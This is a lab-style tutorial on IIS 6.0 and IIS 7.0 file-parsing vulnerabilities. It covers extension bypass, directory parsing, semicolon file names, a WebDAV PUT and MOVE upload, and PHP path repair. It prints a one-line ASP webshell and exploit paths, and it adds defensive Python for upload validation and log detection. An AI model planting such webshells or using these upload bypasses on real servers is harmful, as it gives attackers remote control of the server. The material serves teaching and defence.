1. IIS 6.0 parsing vulnerabilities
   Vulnerability 1 (extension bypass)
   Vulnerability 2 (directory parsing)
   Vulnerability 3 (file-name parsing)
   Supplement (combining vulnerability 3 with PUT)
2. IIS 7.0 parsing vulnerability
IIS 6.0 Parsing Vulnerabilities
Test environment: Windows Server 2003
Vulnerability 1 (extension bypass):
When the target server forbids uploading files with the .asp extension, the .cer or .asa extension can be used instead: IIS 6.0 still hands files with either extension to the ASP engine, so they are parsed and executed as ASP.
Example: peak.cer and peak.asa, each with the following content:
<%
response.write("Hello World!")
%>
Vulnerability 2 (directory parsing):
When a folder named *.asp or *.asa exists on the site, IIS 6.0 parses and executes every file inside that folder as ASP, regardless of the file's own extension. This is also called directory parsing.
Example: create a folder named x.asp in the web root and place a file 1.txt inside it, with the following content:
<%
response.write("Hello World!")
%>
Result (screenshot not reproduced):
Note: the content of 1.txt can be a one-line webshell, which gives the attacker a foothold on the target server, for example: <% eval request("peak") %>
Vulnerability 3 (file-name parsing):
When IIS 6.0 processes a file name of the form *.asp;*.jpg, everything after the semicolon is ignored and the part before it is parsed and executed as ASP. This is mainly used to bypass upload extension blacklists on the target server; it is also called file-name parsing.
Example: peak.asp;jpg or peak.asp;1.jpg, with content: <% eval request("peak") %>
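The three IIS 6.0 tricks above all defeat a naive "reject names ending in .asp" check. The following added example (not code from the original page) contrasts that weak check with an upload validator that applies an extension allow-list, refuses semicolons, and also inspects the directory the file would land in. The allow-list, the ASP-engine extension set (the page names .asp, .asa and .cer; .cdx is also mapped by a default IIS 6.0 install) and all file names are assumptions constructed for the example.

```python
import posixpath
from typing import Tuple

# Extensions that IIS 6.0 maps to the ASP script engine (assumed set for this
# example; the page itself names .asp, .asa and .cer).
ASP_ENGINE_EXTENSIONS = {".asp", ".asa", ".cer", ".cdx"}

# Allow-list for an image-upload endpoint (constructed for this example).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def blacklist_check(filename: str) -> bool:
    """The weak check the page defeats: only names ending in '.asp' are refused."""
    return not filename.lower().endswith(".asp")


def hardened_check(filename: str, upload_dir: str) -> Tuple[bool, str]:
    """Return (accepted, reason) for a proposed upload.

    upload_dir is the server-side directory (forward slashes) the file would be
    written to; it matters because IIS 6.0 executes anything stored inside a
    folder whose name ends in an ASP-engine extension (vulnerability 2).
    """
    name = filename.replace("\\", "/")
    if posixpath.basename(name) != name:
        return False, "path separators are not allowed in a file name"
    # Vulnerability 3: IIS 6.0 stops reading the name at ';', so 'peak.asp;1.jpg'
    # is refused here before any extension logic runs.
    if ";" in name or "\x00" in name:
        return False, "';' or NUL in file name (IIS 6.0 truncates at ';')"

    # Vulnerability 1: allow-list the suffix instead of blacklisting '.asp', so
    # 'peak.cer' and 'peak.asa' are refused along with every other non-image suffix.
    ext = posixpath.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} is not on the allow-list"

    # Vulnerability 2: refuse to store into a directory chain that IIS 6.0 would
    # parse as ASP (e.g. /uploads/x.asp/).
    for segment in upload_dir.replace("\\", "/").split("/"):
        if posixpath.splitext(segment)[1].lower() in ASP_ENGINE_EXTENSIONS:
            return False, f"target directory segment {segment!r} is parsed as ASP"

    return True, "ok"


if __name__ == "__main__":
    cases = [("peak.cer", "/uploads"), ("peak.asp;1.jpg", "/uploads"),
             ("photo.jpg", "/uploads/x.asp"), ("photo.jpg", "/uploads/2024")]
    for fname, target in cases:
        print(f"{fname!r} -> {target}: blacklist={blacklist_check(fname)} "
              f"hardened={hardened_check(fname, target)}")
```

The directory check is the part most upload handlers forget: even a correctly named photo.jpg becomes executable on IIS 6.0 if a user-controlled path segment such as x.asp is allowed to appear above it.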
Supplement:
PUT can be combined with vulnerability 3: upload a one-line webshell as a text file with PUT, then rename it so that IIS parses and executes it as ASP.
Condition: write permission on the web root (WebDAV enabled).
1. First write the one-liner locally. If the target does not allow .asp uploads, .txt is always accepted, e.g. upload xx.txt with content: <% eval request("peak") %>
If PUT is not possible, it is because the Users group has no write permission on the web root; in this test setup Full Control was granted directly.
2. Upload the file with PUT using a tool.
3. Rename the file with the MOVE method using the same tool.
4. Finally, access the target file.
Access (screenshot not reproduced):
AntSword connection (screenshot not reproduced):
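The PUT-then-MOVE sequence above leaves a clear trace in the IIS W3C logs. The following added example (not from the original page) parses a constructed IIS 6.0 log excerpt using the #Fields: directive and flags WebDAV write methods and semicolon-containing request paths. The log lines, IP addresses and field layout are constructed for the example; the set of methods treated as writes is an assumption.

```python
from typing import Dict, List

# Constructed IIS 6.0 W3C-format log excerpt for this example (not from the page).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2024-01-01 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2024-01-01 10:00:01 10.0.0.5 GET /index.asp - 80 - 10.0.0.9 Mozilla/5.0 200 0 0
2024-01-01 10:00:05 10.0.0.5 PUT /xx.txt - 80 - 10.0.0.9 Mozilla/5.0 201 0 0
2024-01-01 10:00:09 10.0.0.5 MOVE /xx.txt - 80 - 10.0.0.9 Mozilla/5.0 201 0 0
2024-01-01 10:00:12 10.0.0.5 GET /xx.asp;.jpg - 80 - 10.0.0.9 Mozilla/5.0 200 0 0
2024-01-01 10:00:15 10.0.0.5 PUT /b.txt - 80 - 10.0.0.9 Mozilla/5.0 403 0 0
"""

# WebDAV methods that create, rename or remove content (assumed set).
WEBDAV_WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log lines, taking column names from the #Fields: directive."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date)
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed row; skip rather than misalign columns
        rows.append(dict(zip(fields, values)))
    return rows


def find_suspicious(text: str) -> List[Dict[str, str]]:
    """Flag WebDAV write requests (noting whether IIS accepted them) and
    request paths containing ';', which only matter under IIS 6.0 file-name parsing."""
    findings: List[Dict[str, str]] = []
    for row in parse_w3c(text):
        method = row.get("cs-method", "")
        stem = row.get("cs-uri-stem", "")
        status = row.get("sc-status", "")
        if method in WEBDAV_WRITE_METHODS:
            outcome = "succeeded" if status.startswith("2") else "denied"
            findings.append({**row, "reason": f"WebDAV write method {method} {outcome}"})
        elif ";" in stem:
            findings.append({**row, "reason": "';' in request path (IIS 6.0 file-name parsing)"})
    return findings


def succeeded_writes(text: str) -> List[str]:
    """Return 'METHOD path' for every write request the server accepted."""
    return [f"{f['cs-method']} {f['cs-uri-stem']}"
            for f in find_suspicious(text) if f["reason"].endswith("succeeded")]


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f["time"], f["c-ip"], f["cs-method"], f["cs-uri-stem"], f["sc-status"], "-", f["reason"])
```

A denied PUT (403 here) is still worth surfacing: it shows a client probing for write access before the permissions change the walkthrough relies on.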
IIS7.0 Parsing Vulnerability
Principle: IIS and Nginx read the requested path from right to left to decide whether they recognise the extension; if the URL ends in .php, for example, the request is handed to PHP. When cgi.fix_pathinfo=1 is enabled in php.ini, PHP "repairs" the file path. What does repair mean? Given the path xx.jpg/xx.txt/xx.php, PHP first checks whether the file xx.jpg/xx.txt/xx.php exists (note: the full path). If it does not, PHP drops /xx.php and keeps looking forward: if xx.jpg/xx.txt exists, that is the file executed; if it does not, PHP drops /xx.txt and checks whether xx.jpg exists, and so on.
Note: here xx.jpg and xx.txt act as directory components as well as files; when the full path cannot be found, PHP walks up one component at a time until it finds something that exists.
Experimental environment: IIS 7.x + any PHP version running as PHP-CGI under FastCGI
Windows Server 2008
phpstudy2018
Exploit conditions:
1. cgi.fix_pathinfo=1 in php.ini
2. IIS 7.0 running PHP in FastCGI mode
(1) First install IIS 7.0 (remember to tick the ASP-related and CGI components), then install phpstudy; I chose the following
(2) Then visit the IIS default page
(3) Create a phpinfo file to test that the environment was built successfully
(4) Create a jpg file containing PHP code
(5) Access it in the browser and see
(6) Then try the path 1.jpg/.php to trigger path repair
(7) It cannot be accessed, so we need to configure it to make PHP path repair take effect:
modify php.ini, set cgi.fix_pathinfo = 1, and remove the comment in front of it
(8) Most importantly, change the website's handler mapping
Confirm
(9) Finally, we exploit this PHP path-repair feature to get execution
http://192.168.100.181/1.jpg/.php
Principle:
Because the URL ends in .php, IIS hands 1.jpg/.php to PHP. PHP repairs the file path 1.jpg/.php: it finds that .php does not exist under 1.jpg/ on the server, so it looks forward to 1.jpg and checks whether that exists. It does, so that file is parsed and executed as PHP code.
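The path-repair walk described above is easier to see as code. The following added example (not code from the original page) models the two halves of the chain: the IIS handler-mapping decision and the php-cgi cgi.fix_pathinfo walk, using the page's xx.jpg/xx.txt/xx.php and 1.jpg/.php paths against a constructed in-memory file listing. The modelling of the IIS side as a "handler is invoked only if the request maps to an existing file" restriction is my assumption about how the mapping can be tightened; the file names are constructed.

```python
from typing import FrozenSet, Iterable, Optional, Tuple

# Constructed web-root listing, mirroring the page's lab: 1.jpg contains PHP code
# but carries an image extension; index.php is an ordinary script.
WEB_ROOT_FILES: FrozenSet[str] = frozenset({"/1.jpg", "/index.php"})


def resolve_script(request_path: str, existing_files: Iterable[str],
                   fix_pathinfo: bool) -> Optional[Tuple[str, str]]:
    """Model of how php-cgi picks the script to execute.

    With cgi.fix_pathinfo=1, PHP checks whether the handed-in path is a real
    file and, if not, strips trailing components until it finds one; the
    stripped remainder becomes PATH_INFO. With cgi.fix_pathinfo=0 the path is
    used as given. Returns (script_path, path_info) or None when nothing is found.
    """
    files = set(existing_files)
    if request_path in files:
        return request_path, ""
    if not fix_pathinfo:
        return None
    parts = request_path.strip("/").split("/")
    # Walk forward one component at a time: /xx.jpg/xx.txt/xx.php -> /xx.jpg/xx.txt -> /xx.jpg
    for cut in range(len(parts) - 1, 0, -1):
        candidate = "/" + "/".join(parts[:cut])
        if candidate in files:
            return candidate, "/" + "/".join(parts[cut:])
    return None


def iis_invokes_php(request_path: str, existing_files: Iterable[str],
                    require_mapped_file: bool) -> bool:
    """Model of the IIS handler-mapping side (assumed behaviour for this example).

    IIS chooses the handler from the trailing extension. If the mapping is
    restricted to requests that map to an existing file, a path such as
    /1.jpg/.php never reaches php-cgi at all.
    """
    if not request_path.lower().endswith(".php"):
        return False
    if require_mapped_file and request_path not in set(existing_files):
        return False
    return True


def executed_file(request_path: str, existing_files: Iterable[str] = WEB_ROOT_FILES,
                  fix_pathinfo: bool = True, require_mapped_file: bool = False) -> Optional[str]:
    """Which file ends up being run as PHP for a request, or None."""
    if not iis_invokes_php(request_path, existing_files, require_mapped_file):
        return None
    resolved = resolve_script(request_path, existing_files, fix_pathinfo)
    return resolved[0] if resolved else None


if __name__ == "__main__":
    for fix, strict in [(True, False), (False, False), (True, True)]:
        print(f"fix_pathinfo={int(fix)} mapped-file-only={strict}: "
              f"/1.jpg/.php runs {executed_file('/1.jpg/.php', fix_pathinfo=fix, require_mapped_file=strict)!r}")
```

Either setting alone closes the chain in this model: with cgi.fix_pathinfo=0 PHP refuses to walk up to 1.jpg, and with the mapping restricted to existing files IIS never hands 1.jpg/.php to PHP in the first place.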